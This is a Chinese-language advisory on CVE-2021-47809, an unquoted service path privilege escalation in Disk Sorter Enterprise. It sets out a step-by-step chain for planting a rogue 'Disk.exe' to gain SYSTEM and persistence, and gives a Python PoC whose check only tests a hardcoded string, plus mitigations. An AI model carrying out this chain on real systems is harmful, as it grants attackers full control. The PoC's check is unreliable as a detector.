CVE-2021-47809: Disk Sorter Enterprise未引号服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2021-47809

漏洞类型

未引号服务路径

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Disk Sorter Enterprise

漏洞概述

CVE-2021-47809是Disk Sorter Enterprise 13.6.12版本中的一个高危本地权限提升漏洞。该漏洞源于Windows服务配置中的未引号服务路径(Unquoted Service Path)问题，允许本地低权限攻击者在特定条件下劫持服务执行流程并获得系统级代码执行权限。攻击者可通过在服务路径的中间目录中植入恶意可执行文件，当服务重启或系统启动时，Windows会按照路径顺序查找并执行第一个匹配的可执行文件，从而触发恶意代码。由于该服务以较高权限(通常是SYSTEM)运行，成功利用此漏洞可实现从普通用户到管理员权限的完全提升，对系统安全构成严重威胁。

技术细节

漏洞存在于Disk Sorter Enterprise的Windows服务'disksrs.exe'的安装路径'C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe'中。由于路径中包含空格且未被双引号包裹，Windows服务控制管理器(SCM)在启动服务时会按以下顺序搜索可执行文件：首先查找'C:\Program.exe'，然后是'C:\Program Files\Disk.exe'，依此类推直到找到'disksrs.exe'。攻击者只需在'C:\Program Files\Disk.exe'位置创建一个恶意的'Disk.exe'可执行文件，当服务启动时会优先执行该文件。Disk Sorter Enterprise服务通常配置为以SYSTEM或LocalSystem权限运行，因此恶意代码也将以最高权限执行，实现权限提升。攻击者需要具备目录写入权限(通常低权限用户可通过某些方式获得)，并等待服务重启或触发服务重启即可完成攻击。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标系统上安装的Disk Sorter Enterprise服务及其配置，确认服务路径为'C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe'且未被引号包裹

STEP 2

步骤2

权限检查：确认当前用户对'C:\Program Files\'目录具有写入权限，或通过其他方式(如Misconfigured ACLs、符号链接攻击等)获得写入能力

STEP 3

步骤3

恶意文件植入：在'C:\Program Files\'目录下创建名为'Disk.exe'的恶意可执行文件，该文件名与服务路径中第一个空格前的单词匹配

STEP 4

步骤4

服务触发：等待服务重启(可通过系统重启、服务手动重启或系统自动更新触发)，Windows SCM会按路径顺序查找可执行文件

STEP 5

步骤5

权限提升：Windows在找到'disksrs.exe'之前会先找到并执行攻击者创建的'Disk.exe'，由于服务以SYSTEM权限运行，恶意代码也以SYSTEM权限执行

STEP 6

步骤6

持久化控制：恶意代码可选择执行恶意操作后调用原始服务程序以维持正常运行，或直接建立持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2021-47809 PoC - Disk Sorter Enterprise Unquoted Service Path
# Author: Security Researcher
# Note: This is for educational and authorized testing purposes only

import os
import sys
import subprocess
import time

def check_vulnerability():
    """Check if the vulnerable service exists"""
    service_name = "DiskSorterEnterprise"
    service_path = r"C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe"
    
    print(f"[*] Checking for vulnerable service: {service_name}")
    print(f"[*] Service binary path: {service_path}")
    
    # Check if path contains spaces and is not quoted
    if ' ' in service_path and not service_path.startswith('"'):
        print("[+] Service path is unquoted - vulnerability may exist")
        return True
    return False

def create_malicious_executable():
    """Create a malicious executable to be placed in the unquoted path"""
    malicious_path = r"C:\Program Files\Disk.exe"
    
    # Create a simple reverse shell or payload
    # This is a placeholder - actual implementation would contain actual malicious code
    payload_code = '''
#include <windows.h>
#include <stdio.h>

int main() {
    // This would contain actual malicious payload
    // For demonstration, just create a log file
    FILE *fp = fopen("C:\\\\temp\\\\pwned.log", "w");
    if (fp) {
        fprintf(fp, "Exploited by CVE-2021-47809 at %s\\n", __TIMESTAMP__);
        fclose(fp);
    }
    // Spawn original service and exit
    WinExec("C:\\\\Program Files\\\\Disk Sorter Enterprise\\\\bin\\\\disksrs.exe", SW_HIDE);
    return 0;
}
'''
    
    print(f"[!] In real attack, malicious executable would be created at: {malicious_path}")
    print("[!] This PoC does not create any malicious files")
    return True

def exploit():
    """Main exploitation function"""
    print("=" * 60)
    print("CVE-2021-47809 - Disk Sorter Enterprise Unquoted Service Path")
    print("=" * 60)
    
    if not check_vulnerability():
        print("[-] Target is not vulnerable")
        return False
    
    create_malicious_executable()
    
    print("\n[*] Attack requires:")
    print("    1. Write access to C:\\\\Program Files\\\\ directory")
    print("    2. Ability to restart the DiskSorter service")
    print("    3. Place malicious Disk.exe in the path")
    print("    4. Wait for service restart")
    
    return True

if __name__ == "__main__":
    exploit()

影响范围

Disk Sorter Enterprise 13.6.12

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解风险：1)修改注册表HKLM\SYSTEM\CurrentControlSet\Services\DiskSorterEnterprise\ImagePath值为带引号的完整路径；2)检查并收紧'C:\Program Files'目录的ACL权限，移除普通用户的写入权限；3)使用Windows内置的sc命令或PowerShell配置服务权限；4)部署端点检测与响应(EDR)解决方案监控异常服务启动行为；5)限制非管理员用户重启服务的权限。